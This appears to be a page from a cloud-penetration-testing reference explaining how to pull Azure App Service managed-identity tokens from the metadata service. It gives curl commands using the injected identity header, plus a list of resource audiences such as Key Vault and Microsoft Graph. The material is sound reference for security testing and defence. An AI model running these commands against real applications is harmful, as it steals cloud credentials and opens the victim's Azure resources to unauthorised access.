Skip to content

Azure App Service

Azure App Service is a managed platform for running web applications.

Property Value
Credentials delivery mechanism Served through link-local metadata service
Protection type Header requires value from environment variable
Exploitation primitives Query arbitrary URL and Read environment variables

Extracting credentials

The Azure App Service runtime injects an environment variable $IDENTITY_HEADER that contains a randomly-generated token. This token needs to be passed in the X-IDENTITY-HEADER HTTP header when calling the metadata service.

The $IDENTITY_ENDPOINT environment variable contains the URL of the metadata service, which should generally be http://169.254.255.2:8081/msi/token.

Extracting credentials for a system-assigned managed identity

curl -H "X-IDENTITY-HEADER: $IDENTITY_HEADER" \
    "$IDENTITY_ENDPOINT?resource=https://management.core.windows.net&api-version=2019-08-01"

Extracting credentials for a user-assigned managed identity

In this case, you need to know the client ID associated with the user-assigned managed identity. The application needs this value to function, so it should typically be available as an environment variable or in a configuration file.

CLIENT_ID=...

curl -H "X-IDENTITY-HEADER: $IDENTITY_HEADER" \
    "$IDENTITY_ENDPOINT?resource=https://management.core.windows.net&api-version=2019-08-01&client_id=$CLIENT_ID"

Selecting the resource parameter to use

The choice of the resource parameter value to use depends on the subsequent APIs you want to try calling. The metadata service returns a JWT with the audience (aud) set to this resource parameter.

Known valid values and their associated API documentation:

Resource URL Description
https://management.azure.com/ Azure REST API (AzureRM)
https://management.core.windows.net/ Azure REST API (Azure Classic)
https://vault.azure.net/ Azure Key Vault REST API
https://servicebus.windows.net/ Service Bus REST API (data plane)
https://batch.core.windows.net/ Azure Batch REST API (data plane)
https://storage.azure.com Azure Storage REST API (data plane)
https://managedhsm.azure.net/ Azure Managed HSMs REST API
https://graph.microsoft.com Microsoft Graph API
https://graph.windows.net/ Azure AD Graph API (deprecated)